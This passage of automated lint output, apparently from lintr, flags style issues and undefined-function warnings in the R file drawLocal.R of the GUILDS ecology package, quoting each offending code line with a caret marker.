operators.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n          ~^~~\n```\n[R/drawLocal.R:2:32:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L2) *style:* **Put spaces around all infix operators.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n                               ^~\n```\n[R/drawLocal.R:2:49:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L2) *style:* **Put spaces around all infix operators.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n                                                ^~\n```\n[R/drawLocal.R:2:59:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L2) *style:* **Put spaces around all infix operators.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n                                                         ~^~\n```\n[R/drawLocal.R:2:62:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L2) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n                                                             ^~~~\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tres <- rep(0, length(k1))\n^\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx0=which(x==0);\n^\n```\n[R/drawLocal.R:3:13:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tres <- rep(0, length(k1))\n           ~^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L4) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx0)) {\n^\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (cnt in 1:length(k1)) {\n^\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n^~\n```\n[R/drawLocal.R:5:13:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (cnt in 1:length(k1)) {\n            ^\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tk <- k1[cnt]\n^~\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~~\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n^~~\n```\n[R/drawLocal.R:7:19:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x, I, th, j, k))\n^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty[idx0] = aux;\n^~\n```\n[R/drawLocal.R:8:16:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x, I, th, j, k))\n               ^~~~~~~~~\n```\n[R/drawLocal.R:8:35:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x, I, th, j, k))\n                                 ~^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txmax <- optimize(f, c(0,1))$minimum\n^~\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx1=which(x==1);\n^\n```\n[R/drawLocal.R:10:22:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txmax <- optimize(f, c(0,1))$minimum\n                    ~^~~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tymax <- pm_sadaux(xmax, I, th, j, k)\n^~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx1)) {\n^\n```\n[R/drawLocal.R:11:11:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\tymax <- pm_sadaux(xmax, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:11:22:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tymax <- pm_sadaux(xmax, I, th, j, k)\n                    ~^~~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty0 <- pm_sadaux(0, I, th, j, k)\n^~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n^~\n```\n[R/drawLocal.R:12:9:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty0 <- pm_sadaux(0, I, th, j, k)\n        ^~~~~~~~~\n```\n[R/drawLocal.R:12:20:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty0 <- pm_sadaux(0, I, th, j, k)\n                  ~^~~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tif(ymax < (y0 + 1)) {\n^~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = -Inf;\n^~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin <- 0\n^~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k==j)&&(th==1)) {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      y[idx1] = 0;\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tf <- function(x) {\n^~~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k==j)&&(th< 1)) {\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k) - ymax + 1)\n^~~~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = Inf;\n^~~\n```\n[R/drawLocal.R:17:12:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k) - ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t}\n^~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t   }\n^~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin <- uniroot(f, c(1e-10, xmax))$root\n^~~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:19:30:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\txmin <- uniroot(f, c(1e-10, xmax))$root\n                            ~^~~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidxp = which((x>0)&(x<1));\n^\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tx1 <- (xmax + 1) / 2\n^~\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\txx=x[idxp];\n^\n```\n[R/drawLocal.R:21:20:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tx1 <- (xmax + 1) / 2\n                   ^~~\n```\n[R/drawLocal.R:21:23:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tx1 <- (xmax + 1) / 2\n                      ^\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n^~\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n^\n```\n[R/drawLocal.R:22:9:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L22) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n        ^~~~~~~~~\n```\n[R/drawLocal.R:22:20:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n                  ~^\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\twhile(ymax < (y1 + 1)) {\n^~\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tx1 <- (x1 + 1) / 2;\n^~~\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I*xx+k) - lgamma(I*xx) +\n^~\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n^~~\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n^~\n```\n[R/drawLocal.R:25:10:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n         ^~~~~~~~~\n```\n[R/drawLocal.R:25:28:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n                          ~^\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  (th-1)*log(1-xx)-log(xx);\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty[idxp] = aux;\n^\n```\n[R/drawLocal.R:27:19:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n^~~~\n```\n[R/drawLocal.R:28:12:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txplu <- uniroot(f, c(xmax, x1), tol=eps())$root\n^~\n```\n[R/drawLocal.R:31:22:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- uniroot(f, c(xmax, x1), tol=eps())$root\n                     ^~~\n```\n[R/drawLocal.R:31:39:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L31) *warning:* **no visible global function definition for ‘eps’, Did you mean 'esk'?**\n```r\n​\t\txplu <- uniroot(f, c(xmax, x1), tol=eps())$root\n                                      ^~~\n```\n[R/drawLocal.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n^~\n```\n[R/drawLocal.R:32:22:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                    ~^~~\n```\n[R/drawLocal.R:32:30:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                            ~^~\n```\n[R/drawLocal.R:32:35:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                 ~^\n```\n[R/drawLocal.R:32:36:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                   ^\n```\n[R/drawLocal.R:33:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- max(0, xlft)\n^~\n```\n[R/drawLocal.R:33:22:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- max(0, xlft)\n                    ~^~~\n```\n[R/drawLocal.R:34:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n^~\n```\n[R/drawLocal.R:34:22:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                    ~^~~\n```\n[R/drawLocal.R:34:30:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                            ~^~\n```\n[R/drawLocal.R:34:35:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                                 ~^~\n```\n[R/drawLocal.R:35:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- min(1, xrgt)\n^~\n```\n[R/drawLocal.R:35:22:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- min(1, xrgt)\n                    ~^~~\n```\n[R/drawLocal.R:36:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:36:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:37:19:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n^~\n```\n[R/drawLocal.R:38:20:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L38) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n                   ^~~~~~~~~\n```\n[R/drawLocal.R:39:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:40:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:40:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L40) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n^~\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L41) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n                         ^\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n                        ~^~\n```\n[R/drawLocal.R:41:60:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n                                                          ~^~\n```\n[R/drawLocal.R:42:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L42) *style:* 